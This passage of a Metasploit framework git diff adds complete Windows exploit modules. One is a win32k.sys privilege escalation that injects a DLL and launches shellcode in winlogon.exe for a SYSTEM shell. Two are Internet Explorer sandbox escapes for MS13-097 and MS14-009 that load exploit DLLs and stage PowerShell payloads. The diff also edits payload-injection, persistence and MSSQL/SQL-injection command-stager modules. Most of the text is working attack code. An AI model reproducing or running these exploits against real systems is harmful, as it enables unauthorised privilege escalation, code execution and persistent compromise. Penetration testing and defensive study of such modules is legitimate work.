+    file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
+    major, minor, build, revision, branch = file_version(file_path)
+    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+
+    case build
+    when 7600
+      return Exploit::CheckCode::Vulnerable
+    when 7601
+      if branch == 18
+        return Exploit::CheckCode::Vulnerable if revision < 18176
+      else
+        return Exploit::CheckCode::Vulnerable if revision < 22348
+      end
+    end
+    return Exploit::CheckCode::Unknown
+  end
+
+
+  def exploit
+    if is_system?
+      fail_with(Exploit::Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo["Architecture"] =~ /wow64/i
+      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
+    elsif sysinfo["Architecture"] =~ /x64/
+      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
+    end
+
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
+    end
+
+    print_status("Launching notepad to host the exploit...")
+    notepad_process_pid = cmd_exec_get_pid("notepad.exe")
+    begin
+      process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
+      print_good("Process #{process.pid} launched.")
+    rescue Rex::Post::Meterpreter::RequestError
+      print_status("Operation failed. Hosting exploit in the current process...")
+      process = client.sys.process.open
+    end
+
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+    library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "schlamperei.x86.dll")
+    library_path = ::File.expand_path(library_path)
+
+    print_status("Injecting exploit into #{process.pid}...")
+    exploit_mem, offset = inject_dll_into_process(process, library_path)
+
+    thread = process.thread.create(exploit_mem + offset)
+    client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000)
+
+    client.sys.process.each_process do |p|
+      if p['name'] == "winlogon.exe"
+        winlogon_pid = p['pid']
+        print_status("Found winlogon.exe with PID #{winlogon_pid}")
+
+        if execute_shellcode(payload.encoded, nil, winlogon_pid)
+          print_good("Everything seems to have worked, cross your fingers and wait for a SYSTEM shell")
+        else
+          print_error("Failed to start payload thread")
+        end
+
+        break
+      end
+    end
+  end
+
+end
+
diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb
new file mode 100644
index 0000000000..1cf3a6204c
--- /dev/null
+++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb
@@ -0,0 +1,121 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/exe'
+require 'msf/core/exploit/powershell'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = GreatRanking
+
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Post::Windows::Priv
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'           => 'MS13-097 Registry Symlink IE Sandbox Escape',
+      'Description'	   => %q{
+        This module exploits a vulnerability in Internet Explorer Sandbox which allows to
+        escape the Enhanced Protected Mode and execute code with Medium Integrity. The
+        vulnerability exists in the IESetProtectedModeRegKeyOnly function from the ieframe.dll
+        component, which can be abused to force medium integrity IE to user influenced keys.
+        By using registry symlinks it's possible force IE to add a policy entry in the registry
+        and finally bypass Enhanced Protected Mode.
+      },
+      'License'	       => MSF_LICENSE,
+      'Author'	       =>
+        [
+          'James Forshaw', # Vulnerability Discovery and original exploit code
+          'juan vazquez' # metasploit module
+        ],
+      'Platform'	     => [ 'win' ],
+      'SessionTypes'   => [ 'meterpreter' ],
+      'Stance'         => Msf::Exploit::Stance::Aggressive,
+      'Targets'	       =>
+        [
+          [ 'IE 8 - 11', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => "Dec 10 2013",
+      'References'     =>
+        [
+          ['CVE', '2013-5045'],
+          ['MSB', 'MS13-097'],
+          ['BID', '64115'],
+          ['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
+        ]
+    ))
+
+    register_options(
+      [
+        OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10])
+      ])
+  end
+
+  def exploit
+    print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?
+
+    mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe')
+    if mod_handle['return'] == 0
+      fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process")
+    end
+
+    unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+      fail_with(Failure::NotVulnerable, "Not running at Low Integrity")
+    end
+
+    begin
+      Timeout.timeout(datastore['DELAY']) { super }
+    rescue Timeout::Error
+    end
+
+    session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", nil)
+    session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", nil)
+  end
+
+  def primer
+    cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
+    session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", cmd)
+
+    html_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.html"
+    session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", html_uri)
+
+    temp = get_env('TEMP')
+
+    print_status("Loading Exploit Library...")
+
+    session.core.load_library(
+      'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-5045", "CVE-2013-5045.dll"),
+      'TargetFilePath'  => temp +  "\\CVE-2013-5045.dll",
+      'UploadLibrary'   => true,
+      'Extension'       => false,
+      'SaveToDisk'      => false
+    )
+  end
+
+  def on_request_uri(cli, request)
+    if request.uri =~ /\.html$/
+      print_status("Sending window close html...")
+      close_html = <<-eos
+<html>
+<body>
+<script>
+window.open('', '_self', '');
+window.close();
+</script>
+</body>
+</html>
+      eos
+      send_response(cli, close_html, { 'Content-Type' => 'text/html' })
+    else
+      send_not_found(cli)
+    end
+  end
+
+end
+
diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
new file mode 100644
index 0000000000..89b2bf9e32
--- /dev/null
+++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
@@ -0,0 +1,173 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/exe'
+require 'msf/core/exploit/powershell'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = GreatRanking
+
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::File
+
+  NET_VERSIONS = {
+    '4.5' => {
+      'dfsvc' => '4.0.30319.17929.17',
+      'mscorlib' => '4.0.30319.18063.18'
+    },
+    '4.5.1' => {
+      'dfsvc' => '4.0.30319.18408.18',
+      'mscorlib' => '4.0.30319.18444.18'
+    }
+  }
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'		=> 'MS14-009 .NET Deployment Service IE Sandbox Escape',
+      'Description'	=> %q{
+        This module abuses a process creation policy in Internet Explorer's sandbox, specifically
+        in the .NET Deployment Service (dfsvc.exe), which allows the attacker to escape the
+        Enhanced Protected Mode, and execute code with Medium Integrity.
+      },
+      'License'	=> MSF_LICENSE,
+      'Author'	=>
+        [
+          'James Forshaw', # Vulnerability Discovery and original exploit code
+          'juan vazquez' # metasploit module
+        ],
+      'Platform'	    => [ 'win' ],
+      'SessionTypes'	=> [ 'meterpreter' ],
+      'Targets'	=>
+        [
+          [ 'IE 8 - 11', { } ]
+        ],
+      'DefaultTarget' => 0,
+      'DefaultOptions'  =>
+        {
+          'WfsDelay' => 30
+        },
+      'DisclosureDate'=> "Feb 11 2014",
+      'References' =>
+        [
+          ['CVE', '2014-0257'],
+          ['MSB', 'MS14-009'],
+          ['BID', '65417'],
+          ['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
+        ]
+    ))
+  end
+
+  def check
+    unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
+      return Exploit::CheckCode::Unknown
+    end
+
+    net_version = get_net_version
+
+    if net_version.empty?
+      return Exploit::CheckCode::Unknown
+    end
+
+    unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
+      return Exploit::CheckCode::Detected
+    end
+
+    mscorlib_version = get_mscorlib_version
+
+    if Gem::Version.new(mscorlib_version) >= Gem::Version.new(NET_VERSIONS[net_version]["mscorlib"])
+      return Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Vulnerable
+  end
+
+  def get_net_version
+    net_version = ""
+
+    dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
+    dfsvc_version = dfsvc_version.join(".")
+
+    NET_VERSIONS.each do |k,v|
+      if v["dfsvc"] == dfsvc_version
+        net_version = k
+      end
+    end
+
+    net_version
+  end
+
+  def get_mscorlib_version
+    mscorlib_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
+    mscorlib_version.join(".")
+  end
+
+  def exploit
+    print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?
+
+    mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe')
+    if mod_handle['return'] == 0
+      fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process")
+    end
+
+    unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+      fail_with(Failure::NotVulnerable, "Not running at Low Integrity")
+    end
+
+    print_status("Searching .NET Deployment Service (dfsvc.exe)...")
+
+    unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
+      fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found")
+    end
+
+    net_version = get_net_version
+
+    if net_version.empty?
+      fail_with(Failure::NotVulnerable, "This module only targets .NET Deployment Service from .NET 4.5 and .NET 4.5.1")
+    end
+
+    print_good(".NET Deployment Service from .NET #{net_version} found.")
+
+    print_status("Checking if .NET is patched...")
+
+    unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
+      fail_with(Failure::NotVulnerable, ".NET Installation can not be verified (mscorlib.dll not found)")
+    end
+
+    mscorlib_version = get_mscorlib_version
+
+    if Gem::Version.new(mscorlib_version) >= Gem::Version.new(NET_VERSIONS[net_version]["mscorlib"])
+      fail_with(Failure::NotVulnerable, ".NET Installation not vulnerable")
+    end
+
+    print_good(".NET looks vulnerable, exploiting...")
+
+    cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
+    session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)
+
+    temp = get_env('TEMP')
+
+    print_status("Loading Exploit Library...")
+
+    session.core.load_library(
+        'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"),
+        'TargetFilePath'  => temp +  "\\CVE-2014-0257.dll",
+        'UploadLibrary'   => true,
+        'Extension'       => false,
+        'SaveToDisk'      => false
+    )
+  end
+
+  def cleanup
+    session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil)
+    super
+  end
+
+end
+
diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb
index 0b7a26f357..76506a500e 100644
--- a/modules/exploits/windows/local/payload_inject.rb
+++ b/modules/exploits/windows/local/payload_inject.rb
@@ -10,6 +10,8 @@ require 'msf/core/exploit/exe'
 class Metasploit3 < Msf::Exploit::Local
   Rank = ExcellentRanking
 
+  include Msf::Post::Windows::Process
+
   def initialize(info={})
     super( update_info( info,
       'Name'          => 'Windows Manage Memory Payload Injection',
@@ -52,13 +54,7 @@ class Metasploit3 < Msf::Exploit::Local
       return
     end
 
-    if @payload_arch.first =~ /64/ and client.platform =~ /x86/
-      print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.")
-      print_error("Migrate to an x64 process and try again.")
-      return false
-    else
-      inject_into_pid(pid)
-    end
+    inject_into_pid(pid)
   end
 
   # Figures out which PID to inject to
@@ -83,8 +79,6 @@ class Metasploit3 < Msf::Exploit::Local
       return false
     end
 
-    pids = []
-
     procs.each do |p|
       found_pid = p['pid']
       return true if found_pid == pid
@@ -144,27 +138,8 @@ class Metasploit3 < Msf::Exploit::Local
 
     begin
       print_status("Preparing '#{@payload_name}' for PID #{pid}")
-      raw = payload.generate
-
-      print_status("Opening process #{pid.to_s}")
-      host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
-      if not host_process
-        print_error("Unable to open #{pid.to_s}")
-        return
-      end
-
-      print_status("Allocating memory in procees #{pid}")
-      mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
-
-      # Ensure memory is set for execution
-      host_process.memory.protect(mem)
-
-      print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
-      print_status("Writing the stager into memory...")
-      host_process.memory.write(mem, raw)
-      host_process.thread.create(mem, 0)
-      print_good("Successfully injected payload in to process: #{pid}")
-
+      raw = payload.encoded
+      execute_shellcode(raw, nil, pid)
     rescue Rex::Post::Meterpreter::RequestError => e
       print_error("Unable to inject payload:")
       print_line(e.to_s)
diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb
index 9ce47a82fc..92d355c3d1 100644
--- a/modules/exploits/windows/local/persistence.rb
+++ b/modules/exploits/windows/local/persistence.rb
@@ -42,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Local
         OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
         OptString.new('REXENAME',[false, 'The name to call payload on remote system.', nil]),
         OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']),
+        OptString.new('PATH',[false, 'Path to write payload']),
       ], self.class)
 
   end
@@ -130,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   # Writes script to target host
   def write_script_to_target(vbs,name)
-    tempdir = session.sys.config.getenv('TEMP')
+    tempdir = datastore['PATH'] || session.sys.config.getenv('TEMP')
     if name == nil
       tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
     else
@@ -139,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Local
     begin
       write_file(tempvbs, vbs)
       print_good("Persistent Script written to #{tempvbs}")
-      @clean_up_rc << "rm #{tempvbs}\n"
+      @clean_up_rc << "rm '#{tempvbs}'\n"
     rescue
       print_error("Could not write the payload on the target hosts.")
       # return nil since we could not write the file on the target host.
diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb
index 07df848e19..334ba89633 100644
--- a/modules/exploits/windows/local/s4u_persistence.rb
+++ b/modules/exploits/windows/local/s4u_persistence.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Local
           'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>',
           'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
         ],
-      'Platform'      => [ 'windows' ],
+      'Platform'      => 'win',
       'SessionTypes'  => [ 'meterpreter' ],
       'Targets'       => [ [ 'Windows', {} ] ],
       'DisclosureDate' => 'Jan 2 2013', # Date of scriptjunkie's blog post
diff --git a/modules/exploits/windows/misc/altiris_ds_sqli.rb b/modules/exploits/windows/misc/altiris_ds_sqli.rb
index 7d62ff1bee..2e33ec7f33 100644
--- a/modules/exploits/windows/misc/altiris_ds_sqli.rb
+++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
- include Msf::Exploit::CmdStagerTFTP
+ include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
@@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
       OptBool.new('DISABLE_SECURITY', [ true, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", false ]),
       OptBool.new('ENABLE_SECURITY',  [ true, "Enable Local Deployment Console Authentication", false ])
     ], self.class)
-
+    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
   def execute_command(cmd, opts = {})
@@ -159,7 +159,7 @@ Processor-Speed=#{processor_speed}
     # CmdStagerVBS was tested here as well, however delivery took roughly
     # 30 minutes and required sending almost 350 notification messages.
     # size constraint requirement for SQLi is: linemax => 393
-    execute_cmdstager({ :delay => 1.5, :temp => '%TEMP%\\'})
+    execute_cmdstager({:delay => 1.5, :temp => '%TEMP%\\', :flavor => :tftp})
   end
 
   def on_new_session(client)
diff --git a/modules/exploits/windows/misc/eureka_mail_err.rb b/modules/exploits/windows/misc/eureka_mail_err.rb
index 84d95f81b5..71bb61e51d 100644
--- a/modules/exploits/windows/misc/eureka_mail_err.rb
+++ b/modules/exploits/windows/misc/eureka_mail_err.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def on_client_connect(client)
-    return if ((p = regenerate_payload(client)) == nil)
+    return unless regenerate_payload(client)
 
     # the offset to eip depends on the local ip address string length...
     already = "Your POP3 server had a problem.\n"
diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb
index 3c8a3deed1..118d832d64 100644
--- a/modules/exploits/windows/misc/fb_cnct_group.rb
+++ b/modules/exploits/windows/misc/fb_cnct_group.rb
@@ -92,11 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
     disconnect
 
     opcode = data.unpack("N*")[0]
-    version = data.unpack("N*")[1]
     if opcode == 3 # Accept
-      if [ 0xffff800b, 0xffff800c ].include?(version)
-        return Exploit::CheckCode::Vulnerable
-      end
       return Exploit::CheckCode::Detected
     end
 
diff --git a/modules/exploits/windows/misc/fb_svc_attach.rb b/modules/exploits/windows/misc/fb_svc_attach.rb
index b9a8b0044a..71daee3976 100644
--- a/modules/exploits/windows/misc/fb_svc_attach.rb
+++ b/modules/exploits/windows/misc/fb_svc_attach.rb
@@ -70,12 +70,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
       connect
 
-      # Attach database
-      op_attach = 19
-
-      # Create database
-      op_create = 20
-
       # Service attach
       op_service_attach = 82
 
diff --git a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb
index 0ae9fb1217..bed2a38e19 100644
--- a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb
@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Powershell
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
+          'CMDSTAGER::DECODER' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
         },
       'Platform'        => 'win',
       'Targets'         =>
@@ -59,8 +59,8 @@ class Metasploit3 < Msf::Exploit::Remote
       [
         Opt::RPORT(5555),
         OptString.new('CMDPATH', [true, 'The cmd.exe path', 'c:\\windows\\system32\\cmd.exe'])
-      ],
-    self.class)
+      ], self.class)
+    deregister_options('CMDSTAGER::FLAVOR')
   end
 
   def check
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
     if target.name =~ /VBScript CMDStager/
       # 7500 just in case, to be sure the command fits after
       # environment variables expansion
-      execute_cmdstager({:linemax => 7500})
+      execute_cmdstager({:flavor => :vbs, :linemax => 7500})
     elsif target.name =~ /Powershell/
       # Environment variables are not being expanded before, neither in CreateProcess
       command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb
index 8f560dc3ed..39a8ca5233 100644
--- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb
+++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb
@@ -203,4 +203,4 @@ user-agent: BBC 11.00.044;  14
     disconnect
   end
 
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/windows/misc/ib_svc_attach.rb b/modules/exploits/windows/misc/ib_svc_attach.rb
index 06b5546915..822aa33146 100644
--- a/modules/exploits/windows/misc/ib_svc_attach.rb
+++ b/modules/exploits/windows/misc/ib_svc_attach.rb
@@ -115,12 +115,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
       connect
 
-      # Attach database
-      op_attach = 19
-
-      # Create database
-      op_create = 20
-
       # Service attach
       op_service_attach = 82
 
diff --git a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb
index 7b6e5330cf..7584f318c6 100644
--- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb
+++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb
@@ -85,8 +85,8 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     # If there is no subdirectory in the request, we need to redirect.
-    if (request.uri == '/') or not (request.uri =~ /\/[^\/]+\//)
-      if (request.uri == '/')
+    if request.uri == '/' || request.uri !~ /\/[^\/]+\//
+      if request.uri == '/'
         subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'
       else
         subdir = request.uri + '/'
@@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # dispatch based on extension
     if (request.uri =~ /\.dll$/i)
       print_status("Sending DLL")
-      return if ((p = regenerate_payload(cli)) == nil)
+      return unless regenerate_payload(cli)
       dll_payload = generate_payload_dll
       send_response(cli, dll_payload, { 'Content-Type' => 'application/octet-stream' })
     else
diff --git a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb
index bef570f7d3..faa807e07b 100644
--- a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb
+++ b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb
@@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
       print_error("Insufficient data from CAD service.")
       return nil
     end
-    rca_port = data[24,port_str_len].unpack('n*').pack('C*').to_i
+    data[24,port_str_len].unpack('n*').pack('C*').to_i
   end
 
 
diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb
index 0f7ba57388..c6a426e5d6 100644
--- a/modules/exploits/windows/misc/mirc_privmsg_server.rb
+++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def on_client_connect(client)
-    return if ((p = regenerate_payload(client)) == nil)
+    return unless regenerate_payload(client)
     print_status("Client connected! Sending payload...")
     buffer = ":my_irc_server.com 001 wow :Welcome to the #{datastore['SRVNAME']} wow\r\n"
     client.put(buffer)
diff --git a/modules/exploits/windows/misc/poppeeper_date.rb b/modules/exploits/windows/misc/poppeeper_date.rb
index 7493959322..da45e45485 100644
--- a/modules/exploits/windows/misc/poppeeper_date.rb
+++ b/modules/exploits/windows/misc/poppeeper_date.rb
@@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def on_client_data(client)
-    return if ((p = regenerate_payload(client)) == nil)
+    return unless regenerate_payload(client)
 
     ok = "+OK\r\n"
     client.put(ok)
diff --git a/modules/exploits/windows/misc/psh_web_delivery.rb b/modules/exploits/windows/misc/psh_web_delivery.rb
index 65a366e4c1..ca485fa83a 100644
--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
@@ -12,6 +12,11 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer
   include Msf::Exploit::Powershell
 
+  include Msf::Module::Deprecated
+
+  DEPRECATION_DATE = Date.new(2014, 10, 23)
+  DEPRECATION_REPLACEMENT = 'exploit/multi/script/web_delivery'
+
   def initialize(info = {})
     super(update_info(info,
       'Name' => 'PowerShell Payload Web Delivery',
diff --git a/modules/exploits/windows/misc/talkative_response.rb b/modules/exploits/windows/misc/talkative_response.rb
index 07ab018d5f..fbeeec1603 100644
--- a/modules/exploits/windows/misc/talkative_response.rb
+++ b/modules/exploits/windows/misc/talkative_response.rb
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def on_client_data(client)
-    return if ((p = regenerate_payload(client)) == nil)
+    return unless regenerate_payload(client)
 
     sploit = ":" + rand_text_alpha_upper(272) + Rex::Arch::X86.jmp_short(6)
     sploit << rand_text_alpha_upper(2) + [target.ret].pack('V') + payload.encoded
diff --git a/modules/exploits/windows/misc/wireshark_lua.rb b/modules/exploits/windows/misc/wireshark_lua.rb
index 63ca919ef1..eec34a0ff8 100644
--- a/modules/exploits/windows/misc/wireshark_lua.rb
+++ b/modules/exploits/windows/misc/wireshark_lua.rb
@@ -128,9 +128,6 @@ class Metasploit3 < Msf::Exploit::Remote
     vprint_status("Received WebDAV PROPFIND request: #{path}")
     body = ''
 
-    my_host   = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-    my_uri    = "http://#{my_host}/"
-
     if path !~ /\/$/
       if path.index(".")
         print_status("Sending 404 for #{path} ...")
diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
index 075012b678..8a16697870 100644
--- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
+++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
@@ -258,7 +258,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # since we need to have credentials for this vuln, we just login and run a query
     # to get the version information
-    if not (version = mssql_query_version)
+    version = mssql_query_version
+    unless version
       return Exploit::CheckCode::Safe
     end
     print_status("@@version returned:\n\t" + version)
@@ -430,7 +431,7 @@ exec sp_executesql @z|
       end
 
       # convert any bad stuff to char(0xXX)
-      if ((idx = badchars.index(ch.chr)))
+      if badchars.index(ch.chr)
         enc << "'" if in_str
         enc << "+char(0x%x)" % ch
         in_str = false
diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
index 31dfc58a78..a16ea8cf0b 100644
--- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb
+++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::MSSQL
   include Msf::Auxiliary::Report
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           [ 'Automatic', { } ],
         ],
+      'CmdStagerFlavor' => 'vbs',
       'DefaultTarget'  => 0
     ))
 
@@ -112,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # Create loot table to store configuration information from crawled database server links
     linked_server_table = Rex::Ui::Text::Table.new(
       'Header'  => 'Linked Server Table',
-      'Ident'   => 1,
+      'Indent'   => 1,
       'Columns' => ['db_server', 'db_version', 'db_os', 'link_server', 'link_user', 'link_privilege', 'link_version', 'link_os','link_state']
     )
     save_loot = ""
@@ -299,7 +300,8 @@ class Metasploit3 < Msf::Exploit::Remote
     # Openquery generator
     else
       exec_at = temp.shift
-      sql = "exec(" + "'"*2**ticks + query_builder_rpc(temp,sql,ticks+1,execute) + "'"*2**ticks +") at [" + exec_at + "]"
+      quotes = "'"*2**ticks
+      sql = "exec(#{quotes}#{query_builder_rpc(temp, sql,ticks + 1, execute)}#{quotes}) at [#{exec_at}]"
       return sql
     end
   end
diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb
index 12d74503a5..3af30dea49 100644
--- a/modules/exploits/windows/mssql/mssql_payload.rb
+++ b/modules/exploits/windows/mssql/mssql_payload.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::MSSQL
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
   #include Msf::Exploit::CmdStagerDebugAsm
   #include Msf::Exploit::CmdStagerDebugWrite
   #include Msf::Exploit::CmdStagerTFTP
@@ -58,6 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           [ 'Automatic', { } ],
         ],
+      'CmdStagerFlavor' => 'vbs',
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'May 30 2000'
       ))
diff --git a/modules/exploits/windows/mssql/mssql_payload_sqli.rb b/modules/exploits/windows/mssql/mssql_payload_sqli.rb
index 687cf8c45d..2ef04fea0b 100644
--- a/modules/exploits/windows/mssql/mssql_payload_sqli.rb
+++ b/modules/exploits/windows/mssql/mssql_payload_sqli.rb
